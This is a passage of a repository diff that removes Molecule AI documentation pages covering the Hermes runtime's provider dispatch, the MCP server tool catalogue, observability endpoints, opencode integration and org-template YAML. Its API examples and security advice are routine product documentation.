# Expected: confirms Anthropic Messages API — no OpenAI-compat translation layer
```
### Native Gemini dispatch
```bash
# 1. Store your Gemini key
curl -s -X PUT $MOLECULE_API/settings/secrets \
-H "Content-Type: application/json" \
-d '{"key":"GEMINI_API_KEY","value":"YOUR-GEMINI-KEY"}' | jq .
# 2. Create a Gemini workspace
GEMINI_WS=$(curl -s -X POST $MOLECULE_API/workspaces \
-H "Content-Type: application/json" \
-d '{
"name": "hermes-gemini",
"role": "Inference worker — native Gemini path",
"runtime": "hermes",
"model": "gemini:gemini-2.0-flash"
}' | jq -r '.id')
# 3. Wait for ready
until curl -s $MOLECULE_API/workspaces/$GEMINI_WS \
| jq -r '.status' | grep -q ready; do sleep 5; done
# 4. Confirm dispatch path
curl -s -X POST $MOLECULE_API/workspaces/$GEMINI_WS/a2a \
-H "Content-Type: application/json" \
-d '{
"jsonrpc":"2.0","id":"probe-2","method":"message/send",
"params":{"message":{"role":"user","parts":[{"kind":"text",
"text":"Which provider API are you calling?"}]}}
}' | jq '.result.parts[0].text'
# Expected: confirms Google generateContent — role: "model" + parts[] wrapper used correctly
```
### Multi-turn history (Phase 2c)
```bash
# Turn 1
curl -s -X POST $MOLECULE_API/workspaces/$ANTHROPIC_WS/a2a \
-H "Content-Type: application/json" \
-d '{
"jsonrpc":"2.0","id":"turn-1","method":"message/send",
"params":{"message":{"role":"user","parts":[{"kind":"text",
"text":"My name is Alice. Remember that."}]}}
}' | jq '.result.parts[0].text'
# Turn 2 — history is threaded as turns, not flattened into a single blob
curl -s -X POST $MOLECULE_API/workspaces/$ANTHROPIC_WS/a2a \
-H "Content-Type: application/json" \
-d '{
"jsonrpc":"2.0","id":"turn-2","method":"message/send",
"params":{"message":{"role":"user","parts":[{"kind":"text",
"text":"What is my name?"}]}}
}' | jq '.result.parts[0].text'
# Expected: "Alice" — role attribution is preserved across turns
```
Before Phase 2c, multi-turn history was flattened into a single user blob. The model could often recover context from the text but lost clean role attribution, which caused failures on structured prompts. Phase 2c passes turns as turns: OpenAI and Anthropic use `{role, content}`; Gemini uses `{role: "model", parts: [{text}]}`.
---
## Multi-provider teams
An orchestrator can fan tasks to Anthropic and Gemini workers simultaneously, each routed through its native path — no application-level provider switching required:
```bash
# Fan out — both workers fire via delegate_task_async
curl -s -X POST $MOLECULE_API/workspaces/$ORCH_ID/a2a \
-H "Content-Type: application/json" \
-d "{
\"jsonrpc\":\"2.0\",\"id\":\"fan-1\",\"method\":\"message/send\",
\"params\":{\"message\":{\"role\":\"user\",\"parts\":[{\"kind\":\"text\",
\"text\":\"delegate_task_async $ANTHROPIC_WS 'Draft release notes for v2.1' AND delegate_task_async $GEMINI_WS 'Summarise the last 30 days of support tickets'\"}]}}
}" | jq .
```
Both workers receive correctly formatted messages through their native paths. No LiteLLM proxy layer. No format translation overhead on every request.
---
## Advanced: stacked system messages
[NousResearch Hermes 4](https://hermes4.nousresearch.com) works best when persona, tool context, and reasoning policy are sent as **separate** `{"role": "system"}` entries rather than one concatenated string. `HermesA2AExecutor` supports this via the `system_blocks` kwarg (PR #499).
### Usage
```python
from workspace_template.executors.hermes_a2a_executor import HermesA2AExecutor
executor = HermesA2AExecutor(
system_blocks=[
"You are a senior security auditor. Be terse and precise.", # persona
"You have access to bash, file search, and grep tools.", # tools context
"Think step-by-step before concluding. Cite evidence.", # reasoning policy
]
)
```
The executor emits each non-empty, non-`None` block as a separate `{"role": "system"}` message in the recommended order: **persona → tools context → reasoning policy**.
### Behaviour
| Condition | Result |
|-----------|--------|
| `system_blocks` is set | Emits one `{"role": "system"}` per non-empty block; `system_prompt` is ignored |
| Entry is `None` or `""` | Silently skipped |
| All entries empty | Zero system messages emitted |
| `system_blocks` not set (`None`) | Falls back to the legacy `system_prompt` path — **fully backward-compatible** |
### Backward compatibility
Callers that pass a single `system_prompt` string are **unaffected**:
```python
# Legacy path — still works, no changes required
executor = HermesA2AExecutor(
system_prompt="You are a security auditor. Think step-by-step."
)
```
Only set `system_blocks` when you want fine-grained control over block ordering or need to inject tool manifests into a dedicated block.
---
## Native tools parameter (Phase 2e — PR #644)
Hermes now passes tool definitions to the model via the native `tools=[]` API parameter instead of injecting them as text in the prompt. This applies to the **Anthropic native dispatch path** and produces structured tool call/result blocks that the Nous/Hermes-3 tool call format handles correctly.
```python
executor = HermesA2AExecutor(
tools=[
{
"name": "bash",
"description": "Run a bash command and return stdout/stderr.",
"input_schema": {
"type": "object",
"properties": {
"command": {"type": "string", "description": "The shell command to run"}
},
"required": ["command"]
}
}
]
)
```
The OpenAI-compat shim path also accepts `tools=[]` but continues to inject them as text-in-prompt for compatibility with OpenRouter-routed models that don't natively support tool calls.
## Structured output — `response_format` (Phase 2e — PR #645)
`response_format=json_schema` is wired through to the Anthropic native dispatch path. Pass a JSON Schema definition to request strictly-typed JSON output from the model:
```python
executor = HermesA2AExecutor(
response_format={
"type": "json_schema",
"json_schema": {
"name": "audit_finding",
"schema": {
"type": "object",
"properties": {
"severity": {"type": "string", "enum": ["critical", "high", "medium", "low"]},
"description": {"type": "string"},
"remediation": {"type": "string"}
},
"required": ["severity", "description", "remediation"]
}
}
}
)
```
The model's completion will always be valid JSON matching the schema. The Gemini native and OpenAI-compat shim paths do not yet support `response_format` — it is silently ignored on those paths.
---
## Capability table
### Shipped (Phases 2a2e — all merged to main)
| Capability | OpenAI-compat shim | Anthropic native | Gemini native |
|---|---|---|---|
| Plain text, single-turn | ✅ | ✅ | ✅ |
| Multi-turn history | ⚠️ flattened into one user blob | ✅ role-attributed turns | ✅ `role: "model"` + `parts` wrapper |
| Correct Gemini wire format | ❌ wrong role, missing parts | — | ✅ |
| No compat-shim translation overhead | ❌ every request translated | ✅ | ✅ |
| Stacked system messages (`system_blocks`) | ❌ | ✅ | ✅ |
| Native `tools=[]` parameter | ⚠️ text-in-prompt injection | ✅ PR #644 | 📋 roadmap |
| Structured output (`response_format=json_schema`) | ❌ | ✅ PR #645 | 📋 roadmap |
### Roadmap (future release)
| Capability | Anthropic native | Gemini native |
|---|---|---|
| Vision content blocks | 📋 | 📋 |
| Streaming | 📋 | 📋 |
| Native tools on Gemini path | — | 📋 |
| Structured output on Gemini path | — | 📋 |
---
## Troubleshooting
### `RuntimeError: anthropic is not installed`
The `anthropic` Python package is missing from the workspace image. Add `anthropic` to `requirements.txt` in your custom image and rebuild, or use the standard `molecule-ai-workspace-template-hermes` image.
### Gemini workspace getting Anthropic dispatch instead
A global `ANTHROPIC_API_KEY` is taking priority. Clear it at the workspace level:
```bash
curl -X PUT $MOLECULE_API/workspaces/$GEMINI_WS/secrets \
-d '{"key":"ANTHROPIC_API_KEY","value":""}'
```
### Multi-turn context lost between calls
Each workspace maintains its own history buffer. Ensure you are sending all turns of a conversation to the same workspace. A2A `context_id` scopes history within the workspace.
### OpenAI-compat shim returns garbled Gemini output
If you are routing a Gemini model through a key that triggers the compat shim (e.g. `OPENROUTER_API_KEY`), you will see the old role/format translation issues. Switch to `GEMINI_API_KEY` for native dispatch.
---
## See also
- [Concepts — Workspaces](/docs/concepts#workspaces)
- [API Reference — POST /workspaces](/docs/api-reference#post-workspaces)
- [Google ADK Runtime](/docs/google-adk) — Gemini-native alternative to Hermes for ADK-first workflows
- PR #240: [Phase 2a — native Anthropic dispatch](https://github.com/Molecule-AI/molecule-core/pull/240)
- PR #255: [Phase 2b — native Gemini dispatch](https://github.com/Molecule-AI/molecule-core/pull/255)
- PR #267: [Phase 2c — multi-turn history on all paths](https://github.com/Molecule-AI/molecule-core/pull/267)
- Issue [#513](https://github.com/Molecule-AI/molecule-core/issues/513)

View File

@ -1,83 +0,0 @@
---
title: Welcome to Molecule AI
description: Multi-agent organisations as code — templates, plugins, channels, and the runtime that ties them together.
---
Molecule AI is an open platform for building, running, and operating
multi-agent organisations. You define your team in one YAML file
(`org.yaml`), pick the plugins each role needs, wire up the channels they
talk on, schedule their recurring work — and the platform takes care of the
rest.
## Try it now
| | |
|---|---|
| **Dashboard** | [app.moleculesai.app](https://app.moleculesai.app) — create orgs, deploy agents |
| **API** | [api.moleculesai.app](https://api.moleculesai.app) — control plane REST API |
| **Documentation** | [doc.moleculesai.app](https://doc.moleculesai.app) — you are here |
| **Status** | [status.moleculesai.app](https://status.moleculesai.app) — uptime monitoring |
| **Self-host** | [Self-Hosting Guide](/docs/self-hosting) — run on your own infrastructure |
## What you can build
- **Self-running engineering teams** — PM, Dev Lead, frontend / backend / devops
agents, security auditor, QA — all coordinating through A2A messages and
scheduled audits, opening real PRs to your real repo.
- **Research squads** — market analysts, technical researchers, competitive
intelligence agents that sweep the web on a cadence and write findings to
shared memory.
- **Product orgs** — anything you can describe as a tree of roles and
responsibilities.
- **Hybrid teams** — mix cloud-hosted agents with [external agents](/docs/external-agents)
running on your own infrastructure, edge devices, or other clouds.
## How it works
1. **Templates.** Describe your org as a YAML tree of workspaces. Each workspace
is a real container running an LLM agent. Templates ship with sensible
defaults so you can spin one up in one command.
2. **Plugins.** Add capabilities to one role or all of them — guardrails,
skills, slash commands, browser automation, MCP servers. Plugins compose;
per-role overrides UNION with the defaults.
3. **Channels.** Connect any role to [Telegram, Slack, or Lark/Feishu](/docs/channels)
so users can talk to agents directly from their existing tools.
4. **Schedules.** Define [recurring work](/docs/schedules) in cron syntax. The
runtime fires the prompt at the scheduled time, supervised against panics
with a liveness watchdog.
5. **Tokens.** Generate [API tokens](/docs/tokens) per workspace for secure
authentication. Rotate, revoke, and audit from the dashboard or API.
6. **The canvas.** A live visualisation of your org — every workspace as a
node, every A2A message as an edge, every memory write tracked in real time.
## Eight runtime adapters
| Runtime | Description |
|---------|-------------|
| Claude Code | Anthropic Claude with code execution |
| LangGraph | LangChain ReAct agent with tools |
| OpenClaw | Multi-file prompt system with SOUL |
| CrewAI | Role-based agent with task delegation |
| AutoGen | Microsoft conversable agents |
| DeepAgents | Deep research with planning |
| Hermes | NousResearch Hermes-3 multi-provider |
| Gemini CLI | Google Gemini CLI workspace |
## Integrate with everything
- **[MCP Server](/docs/mcp-server)** — 87 tools for managing Molecule AI from any
MCP-compatible AI agent (Claude Code, Cursor, etc.)
- **[Python SDK](https://pypi.org/project/molecule-ai-sdk)** — `pip install molecule-ai-sdk`
- **[External Agents](/docs/external-agents)** — register any HTTP agent as a
first-class workspace
## Where to next
- New here? Read the [Quickstart](/docs/quickstart) — spin up your first
agent in under five minutes.
- Want the architecture tour? Start with [Concepts](/docs/concepts) and
[Architecture](/docs/architecture).
- Ready to build your own org? Jump to [Org Templates](/docs/org-template).
- Want to connect your own agent? See [External Agents](/docs/external-agents).
- Need API access? Check [Token Management](/docs/tokens) and the
[API Reference](/docs/api-reference).

View File

@ -1,162 +0,0 @@
---
title: MCP Server
description: Manage Molecule AI workspaces from any MCP-compatible AI agent using 87 tools.
---
The Molecule AI MCP server lets any MCP-compatible AI agent (Claude Code,
Cursor, etc.) manage workspaces, agents, secrets, memory, schedules,
channels, and more through the platform API.
## Quick start
### Install
```bash
npx @molecule-ai/mcp-server@1.0.0
```
### Configure in `.mcp.json`
```json
{
"mcpServers": {
"molecule": {
"type": "stdio",
"command": "npx",
"args": ["@molecule-ai/mcp-server@1.0.0"],
"env": {
"MOLECULE_URL": "http://localhost:8080"
}
}
}
}
```
<Callout type="warn">
**Pin the package version.** The examples above use `@1.0.0` — always specify an exact version and omit the `-y` flag. An unpinned `npx -y @molecule-ai/mcp-server` (no version) silently installs whatever npm serves on the next restart; if the package is ever compromised, it runs with your full MCP client permissions. Check [npm](https://www.npmjs.com/package/@molecule-ai/mcp-server) for the latest stable release before upgrading.
</Callout>
For SaaS deployments, set `MOLECULE_URL` to your tenant URL:
```json
"MOLECULE_URL": "https://your-org.moleculesai.app"
```
### Verify
Once configured, your MCP client should show 87 Molecule AI tools. Test with:
```
list_workspaces
```
## Tool categories
The MCP server exposes tools across these categories:
### Workspace management
| Tool | API Route | Description |
|---|---|---|
| `list_workspaces` | `GET /workspaces` | List all workspaces |
| `create_workspace` | `POST /workspaces` | Create a new workspace |
| `get_workspace` | `GET /workspaces/:id` | Get workspace details |
| `update_workspace` | `PATCH /workspaces/:id` | Update workspace fields |
| `delete_workspace` | `DELETE /workspaces/:id` | Delete a workspace |
| `restart_workspace` | `POST /workspaces/:id/restart` | Restart container |
| `pause_workspace` | `POST /workspaces/:id/pause` | Pause workspace |
| `resume_workspace` | `POST /workspaces/:id/resume` | Resume paused workspace |
### Communication
| Tool | API Route | Description |
|---|---|---|
| `chat_with_agent` | `POST /workspaces/:id/a2a` | Send A2A message |
| `async_delegate` | `POST /workspaces/:id/delegate` | Fire-and-forget delegation |
| `check_delegations` | `GET /workspaces/:id/delegations` | Check delegation status |
| `list_peers` | `GET /registry/:id/peers` | Find peer workspaces |
| `notify_user` | `POST /workspaces/:id/notify` | Push notification to canvas |
### Configuration and secrets
| Tool | API Route | Description |
|---|---|---|
| `get_config` | `GET /workspaces/:id/config` | Get config.yaml |
| `update_config` | `PATCH /workspaces/:id/config` | Update config |
| `list_secrets` | `GET /workspaces/:id/secrets` | List secret keys |
| `set_secret` | `POST /workspaces/:id/secrets` | Set a secret |
| `set_global_secret` | `PUT /settings/secrets` | Set a global secret |
### Memory
| Tool | API Route | Description |
|---|---|---|
| `memory_list` | `GET /workspaces/:id/memory` | List memory keys |
| `memory_get` | `GET /workspaces/:id/memory/:key` | Get value |
| `memory_set` | `POST /workspaces/:id/memory` | Set key-value |
| `search_memory` | `GET /workspaces/:id/memories` | Full-text search |
### Files
| Tool | API Route | Description |
|---|---|---|
| `list_files` | `GET /workspaces/:id/files` | List workspace files |
| `read_file` | `GET /workspaces/:id/files/*path` | Read file content |
| `write_file` | `PUT /workspaces/:id/files/*path` | Write file |
| `replace_all_files` | `PUT /workspaces/:id/files` | Replace all files |
### Schedules
| Tool | API Route | Description |
|---|---|---|
| `list_schedules` | `GET /workspaces/:id/schedules` | List cron schedules |
| `create_schedule` | `POST /workspaces/:id/schedules` | Create schedule |
| `run_schedule` | `POST /workspaces/:id/schedules/:id/run` | Trigger now |
### Channels
| Tool | API Route | Description |
|---|---|---|
| `list_channels` | `GET /workspaces/:id/channels` | List channels |
| `add_channel` | `POST /workspaces/:id/channels` | Add Telegram/Slack/Lark |
| `test_channel` | `POST /workspaces/:id/channels/:id/test` | Test connectivity |
| `send_channel_message` | `POST /workspaces/:id/channels/:id/send` | Send message |
### Plugins
| Tool | API Route | Description |
|---|---|---|
| `list_installed_plugins` | `GET /workspaces/:id/plugins` | List installed |
| `install_plugin` | `POST /workspaces/:id/plugins` | Install from source |
| `uninstall_plugin` | `DELETE /workspaces/:id/plugins/:name` | Uninstall |
### Tokens
| Tool | API Route | Description |
|---|---|---|
| `list_tokens` | `GET /workspaces/:id/tokens` | List workspace tokens |
| `create_token` | `POST /workspaces/:id/tokens` | Create bearer token |
| `revoke_token` | `DELETE /workspaces/:id/tokens/:id` | Revoke token |
### Templates and bundles
| Tool | API Route | Description |
|---|---|---|
| `list_templates` | `GET /templates` | Available templates |
| `import_org` | `POST /org/import` | Import org template |
| `export_bundle` | `GET /bundles/export/:id` | Export workspace |
| `import_bundle` | `POST /bundles/import` | Import workspace |
## Environment variables
| Variable | Default | Description |
|---|---|---|
| `MOLECULE_URL` | `http://localhost:8080` | Platform API URL |
## Troubleshooting
| Issue | Fix |
|---|---|
| Connection refused | Check `MOLECULE_URL` points to running platform |
| 401 Unauthorized | Token expired or revoked — create a new one |
| Tools not showing | Run `npx @molecule-ai/mcp-server@1.0.0` standalone to check errors |

View File

@ -1,32 +0,0 @@
{
"title": "Documentation",
"pages": [
"index",
"changelog",
"quickstart",
"concepts",
"workspace-config",
"architecture",
"org-template",
"plugins",
"channels",
"schedules",
"external-agents",
"tokens",
"api-reference",
"mcp-server",
"self-hosting",
"self-hosting/admin-token",
"observability",
"troubleshooting",
"---Security---",
"security/index",
"security/safe-mcp-advisory",
"security/owasp-agentic-top-10",
"---Runtimes---",
"google-adk",
"hermes",
"---Integrations---",
"opencode"
]
}

View File

@ -1,180 +0,0 @@
---
title: Observability
description: Monitor agent activity, LLM traces, and platform health.
---
## Overview
Molecule AI provides multiple layers of observability -- from real-time WebSocket events on the canvas to structured activity logs, LLM traces, Prometheus metrics, and admin health endpoints.
## Activity Logs
Every significant action in the platform is recorded in the `activity_logs` table. Query logs for a specific workspace:
```
GET /workspaces/:id/activity
```
Activity types include:
- **A2A communications** -- request/response capture with duration and method
- **Task updates** -- agent-reported task status changes
- **Agent logs** -- structured log entries from workspace runtimes
- **Errors** -- failures with `error_detail` for debugging
Filter by source to separate user-agent chat (`source=canvas`) from agent-to-agent traffic (`source=agent`).
Activity logs are automatically cleaned up based on `ACTIVITY_RETENTION_DAYS` (default 7). The cleanup job runs every `ACTIVITY_CLEANUP_INTERVAL_HOURS` (default 6).
## LLM Traces
Molecule AI integrates with [Langfuse](https://langfuse.com) for LLM observability. Langfuse runs as part of the infrastructure stack on port 3001, backed by ClickHouse for efficient trace storage.
View traces for a specific workspace:
```
GET /workspaces/:id/traces
```
The Langfuse UI at `http://localhost:3001` provides:
- Token usage and cost tracking per workspace
- Latency breakdowns for LLM calls
- Prompt/completion pairs for debugging
- Trace timelines showing multi-step agent reasoning
## Prometheus Metrics
The platform exposes Prometheus-format metrics at:
```
GET /metrics
```
This endpoint requires no authentication and is safe to scrape. Metrics are in Prometheus text format (v0.0.4) and include:
- Request counts by method, path, and status code
- Request latency histograms
- Active WebSocket connections
- Workspace status counts
Configure your Prometheus instance to scrape `http://localhost:8080/metrics` at your preferred interval.
## Per-Workspace Token Metrics
Track LLM token consumption per workspace — input tokens, output tokens, and Anthropic prompt-cache reads/writes — aggregated over two rolling windows:
```
GET /workspaces/:id/metrics
```
Requires a **workspace bearer token** (`Authorization: Bearer <token>`). Returns:
```json
{
"workspace_id": "uuid",
"token_metrics": {
"1h": {
"input_tokens": 1250,
"output_tokens": 430,
"cache_read_tokens": 800,
"cache_write_tokens": 200
},
"30d": {
"input_tokens": 84200,
"output_tokens": 28100,
"cache_read_tokens": 52000,
"cache_write_tokens": 9400
}
}
}
```
| Field | Description |
|-------|-------------|
| `input_tokens` | Tokens in the prompt sent to the LLM (sum over window) |
| `output_tokens` | Tokens in the completion returned by the LLM |
| `cache_read_tokens` | Prompt tokens served from Anthropic's prompt cache |
| `cache_write_tokens` | Prompt tokens written into Anthropic's prompt cache |
The **canvas WorkspaceUsage panel** (⊞ icon → Usage tab) displays these same metrics live, updating each time the workspace reports a heartbeat.
## Admin Liveness
The liveness endpoint reports the health of every supervised subsystem:
```
GET /admin/liveness
```
This endpoint requires `AdminAuth` (bearer token). It returns a `supervised.Snapshot()` for each subsystem with ages -- how long since each subsystem last reported healthy. Use this to debug stuck schedulers, stalled heartbeat goroutines, or unresponsive health sweeps before diving into logs.
## WebSocket Events
The canvas receives real-time updates via WebSocket at `/ws`. Every state change in the platform is broadcast to connected clients:
| Event | Trigger |
|-------|---------|
| `WORKSPACE_ONLINE` | Workspace registers successfully |
| `WORKSPACE_OFFLINE` | Heartbeat TTL expires or health sweep detects dead container |
| `WORKSPACE_DEGRADED` | Error rate exceeds threshold |
| `WORKSPACE_RECOVERED` | Error rate drops back to normal |
| `WORKSPACE_REMOVED` | Workspace deleted |
| `HEARTBEAT` | Periodic heartbeat from workspace |
| `A2A_RESPONSE` | Agent-to-agent message received |
| `AGENT_MESSAGE` | Agent pushes a message to the user |
Events flow through Redis pub/sub to ensure all platform instances broadcast consistently.
## Structure Events
The `structure_events` table is an append-only audit log of every structural change in the platform. Each event is:
1. Inserted into the database via `broadcaster.RecordAndBroadcast()`
2. Published to Redis pub/sub
3. Relayed to WebSocket clients
Query events for a specific workspace or globally:
```
GET /events/:workspaceId # Workspace-specific
GET /events # All events
```
Both endpoints require `AdminAuth`.
## Session Search
Search through chat history for a workspace:
```
GET /workspaces/:id/session-search?q=deployment+error
```
This searches across both user-agent conversations and agent-to-agent A2A traffic stored in the activity logs.
## Current Task Visibility
Each workspace reports its current task via heartbeat. This is visible in two places:
- **Canvas node** -- the workspace card on the canvas shows the current task text
- **Heartbeat data** -- `GET /registry/discover/:id` includes `current_task` in the workspace info
When `active_tasks` drops to zero, the current task field clears and the idle loop (if configured) begins its countdown.
## Schedule Run History
For workspaces with cron schedules, inspect past runs:
```
GET /workspaces/:id/schedules/:scheduleId/history
```
Each history entry includes:
- Execution timestamp
- Status (`success`, `failed`, `skipped`)
- Duration
- `error_detail` when the run failed (populated by `scheduler.fireSchedule`)
A status of `skipped` means the workspace was busy (active tasks > 0) when the schedule fired and the concurrency-aware scheduler chose not to queue the prompt.

View File

@ -1,165 +0,0 @@
---
title: opencode Integration
description: Use opencode as an AI coding agent connected to your Molecule AI workspace via remote MCP.
---
## Overview
[opencode](https://opencode.ai) is an AI coding agent that supports remote MCP
servers via `opencode.json`. With Molecule AI's MCP bridge you can wire opencode
directly to your workspace — giving it the full A2A tool surface
(`delegate_task`, `list_peers`, `recall_memory`, and more) over a standard
`Authorization: Bearer` connection.
```
opencode (terminal)
↕ opencode.json declares remote MCP
Molecule AI MCP endpoint
↕ WorkspaceAuth middleware
Your workspace agent
```
---
## Prerequisites
- A running Molecule AI platform (`MOLECULE_MCP_URL` — e.g. `https://api.molecule.ai`)
- A workspace-scoped bearer token (`MOLECULE_MCP_TOKEN`) issued via the platform API (see [Token Management](/docs/tokens))
---
## 1. Declare Molecule as a remote MCP server
Create (or extend) `opencode.json` in your project root:
```json
{
"mcpServers": {
"molecule": {
"type": "remote",
"url": "${MOLECULE_MCP_URL}/workspaces/${WORKSPACE_ID}/mcp",
"headers": { "Authorization": "Bearer ${MOLECULE_MCP_TOKEN}" },
"description": "Molecule AI A2A orchestration — delegate_task, list_peers, check_task_status"
}
}
}
```
> ⚠️ **Never embed the token in the URL** (e.g. `?token=…`). Always use the
> `Authorization: Bearer` header — URL-embedded tokens appear in server logs,
> browser history, and Git history if the file is committed.
A pre-configured template is available in
`org-templates/molecule-dev/opencode.json` in the monorepo.
---
## 2. Obtain a workspace-scoped token
```bash
curl -X POST https://$MOLECULE_MCP_URL/workspaces/$WORKSPACE_ID/tokens \
-H "Authorization: Bearer $ADMIN_TOKEN" \
-H "Content-Type: application/json" \
-d '{"name": "opencode-agent", "scopes": ["mcp:read", "mcp:delegate"]}'
```
Store the returned token as `MOLECULE_MCP_TOKEN` in your `.env`.
See [Token Management](/docs/tokens) for rotation, revocation, and auditing.
---
## 3. Available tools
When opencode connects to the Molecule MCP endpoint the agent gains access to:
| Tool | Description |
|------|-------------|
| `list_peers` | Discover available workspaces in your org |
| `delegate_task` | Send a task to a peer workspace and wait for the result |
| `delegate_task_async` | Fire-and-forget task delegation; returns a `task_id` |
| `check_task_status` | Poll an async delegation by `task_id` |
| `commit_memory` | Persist information to `LOCAL` or `TEAM` memory scope |
| `recall_memory` | Search previously committed memories |
### Restricted tools
- **`send_message_to_user`** — disabled for remote MCP callers by default. Enable
with `MOLECULE_MCP_ALLOW_SEND_MESSAGE=true` in your platform env.
- **`GLOBAL` memory scope** — `commit_memory` with `scope: GLOBAL` is blocked for
external agents. `LOCAL` and `TEAM` scopes are always available.
---
## 4. Example: delegate a research task
Once connected, opencode can call Molecule tools directly in its tool loop:
```json
{
"tool": "delegate_task",
"arguments": {
"target": "research-lead",
"task": "Summarise the last 7 days of commits in Molecule-AI/molecule-monorepo"
}
}
```
The platform routes the task to your `research-lead` workspace and streams the
response back to opencode.
---
## 5. Two transports
The MCP endpoint supports two transports — opencode auto-selects:
| Transport | Endpoint | Notes |
|-----------|----------|-------|
| Streamable HTTP (primary) | `POST /workspaces/:id/mcp` | MCP 2024-11-05, recommended |
| SSE (backwards compat) | `GET /workspaces/:id/mcp/stream` | Legacy clients |
---
## 6. Security notes
### Org topology exposure (SAFE-T1401)
`list_peers` returns the full set of workspace names and roles visible to your
workspace. Any opencode agent with a valid `MOLECULE_MCP_TOKEN` can enumerate
your org topology. Issue tokens to only the workspaces that need peer visibility.
### Tool surface audit (SAFE-T1201)
The full `@molecule-ai/mcp-server` package exposes additional tools beyond those
listed above. A complete SAFE-T1201 audit is in progress. **Until that audit
completes, do not expose the MCP server to untrusted external agents in
production.**
### Token scoping
Issue tokens with the minimum required scopes (`mcp:read`, `mcp:delegate`).
Rotate tokens regularly. Revoke via `DELETE /workspaces/:id/tokens/:token_id`.
---
## 7. Environment variables
Add to your `.env`:
```bash
MOLECULE_MCP_URL=https://api.molecule.ai # or http://localhost:8080 for local dev
MOLECULE_MCP_TOKEN= # workspace-scoped bearer token (step 2)
WORKSPACE_ID= # UUID of the workspace opencode acts as
# find it in the Canvas sidebar or GET /workspaces
```
See `.env.example` in the monorepo for the full canonical reference.
---
## Related
- [MCP Server](/docs/mcp-server) — full tool catalogue for the `@molecule-ai/mcp-server` package
- [Token Management](/docs/tokens) — issue, rotate, and revoke workspace tokens
- [External Agents](/docs/external-agents) — register any HTTP agent as a first-class workspace

View File

@ -1,166 +0,0 @@
---
title: Org Templates
description: Deploy entire multi-workspace organizations from a single YAML file.
---
## Overview
Org templates let you define an entire agent organization -- hierarchy of workspaces with roles, configurations, and relationships -- in a single YAML file. Import one template and the platform provisions every workspace, wires parent-child relationships, seeds schedules, and installs plugins automatically.
## YAML Structure
A minimal org template looks like this:
```yaml
org_name: molecule-dev
defaults:
runtime: claude-code
tier: 2
plugins:
- molecule-dev
- molecule-careful-bash
workspaces:
pm:
name: Project Manager
role: PM
tier: 3
children:
dev-lead:
name: Dev Lead
children:
backend:
name: Backend Engineer
frontend:
name: Frontend Engineer
marketing:
name: Marketing Specialist
runtime: langgraph
```
The `workspaces` map defines the hierarchy. Each key becomes the workspace's slug. Nesting under `children` sets the parent-child relationship automatically.
## Workspace Fields
Each workspace entry supports the following fields:
| Field | Type | Description |
|-------|------|-------------|
| `name` | string | Display name shown on the canvas |
| `role` | string | Agent role (e.g. PM, Engineer, Researcher) |
| `runtime` | string | Runtime adapter (`claude-code`, `langgraph`, `crewai`, etc.) |
| `tier` | integer | Resource tier (2 = Standard, 3 = Privileged, 4 = Full-host) |
| `workspace_dir` | string | Host path for `/workspace` bind-mount |
| `plugins` | list | Plugins to install on this workspace |
| `initial_prompt` | string | Prompt auto-executed after A2A server is ready |
| `idle_prompt` | string | Prompt fired periodically while workspace is idle |
| `idle_interval_seconds` | integer | Interval for idle prompt (default 600, minimum 60) |
| `channels` | list | Social channel integrations (Telegram, Slack, etc.) |
| `schedules` | list | Cron schedules seeded on import |
| `x` | number | Canvas X coordinate |
| `y` | number | Canvas Y coordinate |
| `children` | map | Nested child workspaces |
## Defaults Layer
The `defaults` block sets baseline values for every workspace in the template. Per-workspace fields override defaults when specified.
**Plugin merging is additive.** Per-workspace `plugins` lists UNION with `defaults.plugins` (deduplicated, defaults first) -- they do not replace them. To opt a specific default plugin out for a given workspace, prefix the plugin name with `!` or `-`:
```yaml
defaults:
plugins:
- molecule-dev
- molecule-careful-bash
- browser-automation
workspaces:
backend:
name: Backend Engineer
plugins:
- molecule-skill-code-review # added
- "!browser-automation" # opted out of default
```
In this example, the backend workspace gets `molecule-dev`, `molecule-careful-bash`, and `molecule-skill-code-review` -- but not `browser-automation`.
## Template Registry
Five org templates live in standalone repos under the `Molecule-AI` GitHub organization:
| Template | Repo |
|----------|------|
| molecule-dev | `Molecule-AI/molecule-ai-org-template-molecule-dev` |
| marketing-team | `Molecule-AI/molecule-ai-org-template-marketing-team` |
| research-lab | `Molecule-AI/molecule-ai-org-template-research-lab` |
| startup-mvp | `Molecule-AI/molecule-ai-org-template-startup-mvp` |
| enterprise-ops | `Molecule-AI/molecule-ai-org-template-enterprise-ops` |
These are cloned into the platform image at Docker build time and registered in the `template_registry` database table.
## Importing an Org Template
### Via API
```bash
curl -X POST http://localhost:8080/org/import \
-H "Content-Type: application/json" \
-H "Authorization: Bearer $TOKEN" \
-d '{"dir": "molecule-dev"}'
```
The `POST /org/import` endpoint requires `AdminAuth` (bearer token). The `dir` field references a template directory name from the registry.
### Via Canvas
Open the template browser in the canvas sidebar and select an org template. The UI calls the same API endpoint.
## Initial Prompts
Workspaces can auto-execute a prompt on startup before any user interaction. Set `initial_prompt` as an inline string or point `initial_prompt_file` to a path relative to the config directory.
After the A2A server is ready, the runtime sends the prompt as a `message/send` to itself. A `.initial_prompt_done` marker file prevents re-execution on restart.
**Important:** Initial prompts must NOT send A2A messages (`delegate_task`, `send_message_to_user`) because other agents may not be ready yet. Keep them local: clone a repo, read docs, save to memory, wait for tasks.
Org templates support `initial_prompt` on both `defaults` (all agents) and per-workspace (overrides default).
## Idle Loop
The idle loop is an opt-in pattern for workspaces that should do periodic background work when they have no active tasks.
When `idle_prompt` is non-empty in the workspace config, the runtime self-sends the prompt every `idle_interval_seconds` (default 600) while `heartbeat.active_tasks == 0`. The fire timeout clamps to `max(60, min(300, idle_interval_seconds))`.
Set per-workspace or as an org template default:
```yaml
defaults:
idle_prompt: "Check for new issues and update your task list."
idle_interval_seconds: 300
```
The idle check is local (no LLM call) and the prompt only fires when there is genuinely nothing to do, so cost collapses to event-driven.
## Canvas Positioning
Use `x` and `y` fields to control where workspaces appear on the drag-and-drop canvas after import:
```yaml
workspaces:
pm:
name: Project Manager
x: 400
y: 100
children:
dev:
name: Developer
x: 200
y: 300
researcher:
name: Researcher
x: 600
y: 300
```
If coordinates are omitted, the canvas auto-layouts new workspaces.

View File

@ -1,388 +0,0 @@
---
title: Plugins
description: Extend workspace capabilities with modular plugins — guardrails, skills, workflows.
---
## Overview
Plugins are installable capability bundles that extend what a workspace can do.
They range from ambient guardrails that enforce rules automatically, to
on-demand skills invoked via the `Skill` tool, to workflow plugins that
compose skills into slash commands.
Plugins follow a **two-axis model**: the *source* (where the plugin comes from)
